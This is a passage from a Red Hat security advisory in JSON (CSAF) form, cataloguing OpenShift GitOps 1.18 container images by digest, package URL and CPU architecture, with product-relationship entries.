"product_id": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-agent-rhel8@sha256%3Ad2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3A82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3Acc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3Ad9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3Ad84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3Adf33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3A7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3Ae2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3A702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-agent-rhel8@sha256%3A2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3Ae9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3A73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3Af988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3Ae03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3Adafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3Aeb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3Abd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3A87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64 as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le as a component of Red Hat OpenShift GitOps 1.18",
"product_id": "Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.18"
},
{
"category": "default_component_of",
"full_product_name": {
